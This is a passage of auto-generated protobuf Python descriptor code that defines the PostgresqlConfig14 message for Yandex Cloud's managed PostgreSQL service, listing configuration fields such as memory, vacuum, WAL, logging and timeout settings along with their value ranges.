      name='SHARED_PRELOAD_LIBRARIES_TIMESCALEDB', index=3, number=3,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
    _descriptor.EnumValueDescriptor(
      name='SHARED_PRELOAD_LIBRARIES_PG_QUALSTATS', index=4, number=4,
      serialized_options=None,
      type=None,
      create_key=_descriptor._internal_create_key),
  ],
  containing_type=None,
  serialized_options=None,
  # Byte offsets of this enum's definition inside the serialized file
  # descriptor held by DESCRIPTOR; must stay in sync with the generator.
  serialized_start=12243,
  serialized_end=12480,
)
_sym_db.RegisterEnumDescriptor(_POSTGRESQLCONFIG14_SHAREDPRELOADLIBRARIES)
_POSTGRESQLCONFIG14 = _descriptor.Descriptor(
name='PostgresqlConfig14',
full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='max_connections', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_connections', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='shared_buffers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.shared_buffers', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='temp_buffers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.temp_buffers', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_prepared_transactions', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_prepared_transactions', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='work_mem', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.work_mem', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='maintenance_work_mem', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.maintenance_work_mem', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_work_mem', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_work_mem', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='temp_file_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.temp_file_limit', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_cost_delay', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_cost_delay', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_cost_page_hit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_cost_page_hit', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_cost_page_miss', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_cost_page_miss', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_cost_page_dirty', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_cost_page_dirty', index=11,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='vacuum_cost_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.vacuum_cost_limit', index=12,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bgwriter_delay', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.bgwriter_delay', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\01010-10000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bgwriter_lru_maxpages', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.bgwriter_lru_maxpages', index=14,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bgwriter_lru_multiplier', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.bgwriter_lru_multiplier', index=15,
number=16, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bgwriter_flush_after', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.bgwriter_flush_after', index=16,
number=17, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-2048', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backend_flush_after', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.backend_flush_after', index=17,
number=18, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-2048', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='old_snapshot_threshold', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.old_snapshot_threshold', index=18,
number=19, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\013-1-86400000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='wal_level', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.wal_level', index=19,
number=20, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='synchronous_commit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.synchronous_commit', index=20,
number=21, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='checkpoint_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.checkpoint_timeout', index=21,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\01630000-86400000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='checkpoint_completion_target', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.checkpoint_completion_target', index=22,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='checkpoint_flush_after', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.checkpoint_flush_after', index=23,
number=24, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-2048', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_wal_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_wal_size', index=24,
number=25, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='min_wal_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.min_wal_size', index=25,
number=26, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_standby_streaming_delay', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_standby_streaming_delay', index=26,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_statistics_target', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.default_statistics_target', index=27,
number=28, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='constraint_exclusion', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.constraint_exclusion', index=28,
number=29, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cursor_tuple_fraction', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.cursor_tuple_fraction', index=29,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='from_collapse_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.from_collapse_limit', index=30,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0141-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='join_collapse_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.join_collapse_limit', index=31,
number=32, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0141-2147483647', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='force_parallel_mode', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.force_parallel_mode', index=32,
number=33, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='client_min_messages', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.client_min_messages', index=33,
number=34, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_messages', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_min_messages', index=34,
number=35, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_error_statement', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_min_error_statement', index=35,
number=36, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_min_duration_statement', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_min_duration_statement', index=36,
number=37, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_checkpoints', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_checkpoints', index=37,
number=38, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_connections', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_connections', index=38,
number=39, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_disconnections', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_disconnections', index=39,
number=40, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_duration', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_duration', index=40,
number=41, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_error_verbosity', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_error_verbosity', index=41,
number=42, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_lock_waits', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_lock_waits', index=42,
number=43, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_statement', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_statement', index=43,
number=44, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_temp_files', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.log_temp_files', index=44,
number=45, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='search_path', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.search_path', index=45,
number=46, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='row_security', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.row_security', index=46,
number=47, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_transaction_isolation', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.default_transaction_isolation', index=47,
number=48, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='statement_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.statement_timeout', index=48,
number=49, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lock_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.lock_timeout', index=49,
number=50, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='idle_in_transaction_session_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.idle_in_transaction_session_timeout', index=50,
number=51, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bytea_output', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.bytea_output', index=51,
number=52, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='xmlbinary', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.xmlbinary', index=52,
number=53, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='xmloption', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.xmloption', index=53,
number=54, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gin_pending_list_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.gin_pending_list_limit', index=54,
number=55, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deadlock_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.deadlock_timeout', index=55,
number=56, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_locks_per_transaction', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_locks_per_transaction', index=56,
number=57, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_pred_locks_per_transaction', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.max_pred_locks_per_transaction', index=57,
number=58, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='array_nulls', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.array_nulls', index=58,
number=59, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backslash_quote', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.backslash_quote', index=59,
number=60, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_with_oids', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.default_with_oids', index=60,
number=61, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='escape_string_warning', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.escape_string_warning', index=61,
number=62, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lo_compat_privileges', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.lo_compat_privileges', index=62,
number=63, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quote_all_identifiers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.quote_all_identifiers', index=63,
number=65, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='standard_conforming_strings', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.standard_conforming_strings', index=64,
number=66, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='synchronize_seqscans', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.synchronize_seqscans', index=65,
number=67, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='transform_null_equals', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.transform_null_equals', index=66,
number=68, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='exit_on_error', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.exit_on_error', index=67,
number=69, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='seq_page_cost', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.seq_page_cost', index=68,
number=70, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='random_page_cost', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.random_page_cost', index=69,
number=71, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_max_workers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_max_workers', index=70,
number=72, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0041-32', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_vacuum_cost_delay', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_vacuum_cost_delay', index=71,
number=73, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\006-1-100', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_vacuum_cost_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_vacuum_cost_limit', index=72,
number=74, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\010-1-10000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='autovacuum_naptime', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.autovacuum_naptime', index=73,
number=75, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\r1000-86400000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='archive_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.archive_timeout', index=74,
number=76, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\01610000-86400000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='track_activity_query_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlConfig14.track_activity_query_size', index=75,
number=77, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
